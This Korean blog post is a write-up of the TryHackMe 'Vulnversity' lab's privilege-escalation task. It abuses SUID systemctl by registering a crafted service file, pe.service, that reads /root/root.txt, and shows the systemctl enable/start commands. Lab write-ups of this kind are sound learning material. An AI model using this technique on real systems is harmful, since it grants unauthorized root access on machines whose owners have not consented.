THM Offensive Pentesting - Vulnversity

2023. 6. 8. 16:47·System/침투

Task 5. Privilege Escalation

- SUID를 이용한 권한 상승

- systemctl 이용

 

나는 systemctl를 서비스 시작/정지 작업을 위한 유틸리티로만 알고 있었는데, 다른 기능도 있더라.

systemctl 통해서 시스템 부팅 시 특정 서비스가 자동으로 시작하도록 설정할 수 있다. 마침 오늘 오전에 centOS tomcat 구축하며 알았다. 이 경험이 아니었으면 한참 더 헤맸을 듯 하다.

 

아무튼, 이를 이용하여 flag를 얻어보자.

 

1. pe.service

[Unit]
Description=pe to root

[Service]
ExecStart=/bin/bash -c 'cat /root/root.txt > flag.txt'

[Install]
WantedBy=multi-user.target

- 리버스쉘 이후 vi만 켜면 오류가 잦아서, 리다이렉션 통해서 생성했다.

echo "내용" > pe.service

 

2. 서비스 등록

systemctl enable pe.service
systemctl start pe

 

3. 리버스쉘 끊고 다시 접근

- flag.txt 확인가능

 

 

 

저작자표시 (새창열림)

'System > 침투' 카테고리의 다른 글

THM Offensive Pentesting - Kenobi  (0) 2023.07.17
THM Offensive Pentesting - Blue  (0) 2023.06.17
APC injection 실습 (2)  (0) 2023.03.31
APC Injection 실습 (1)  (0) 2023.03.30
3. APC(Asynchronous Procedure Call) Injection  (0) 2023.03.30
'System/침투' 카테고리의 다른 글
  • THM Offensive Pentesting - Kenobi
  • THM Offensive Pentesting - Blue
  • APC injection 실습 (2)
  • APC Injection 실습 (1)
병뚜
병뚜
열정!
  • 병뚜
    열려라 뚜껑
    병뚜
  • 전체
    오늘
    어제
    • all (372)
      • 일상X사랑X돈 (0)
        • 보안이슈 (114)
        • 뜨거운감자 (9)
        • 맛집 (2)
        • 혼잣말 (16)
      • 보안 (87)
        • 웹·모바일 (46)
        • 인프라 (19)
        • 리버싱 (8)
        • Security-Gym (10)
        • 리뷰 (4)
      • 프로그래밍 (66)
        • python (14)
        • java (12)
        • js (40)
      • System (47)
        • OS (14)
        • 침투 (33)
      • Play (20)
        • wargame (20)
      • 기타 (10)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    혼공학습단
    파이썬공부
    IT뉴스
    혼공단
    자바스크립트 상속
    악성코드
    it이슈
    정보보호
    리버싱
    jwt
    뉴스요약
    정보보안교육
    파이썬초보
    정보보안
    혼공
    리버싱초보
    파이썬
    공급망공격
    윈도우인터널스
    혼공파
    랜섬웨어
    혼자공부하는파이썬
    파이썬입문
    보안이슈
    드림핵리버싱
    커널디버깅
    보안뉴스
    windows internals
    프로세스
    kisa
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
병뚜
THM Offensive Pentesting - Vulnversity
상단으로

티스토리툴바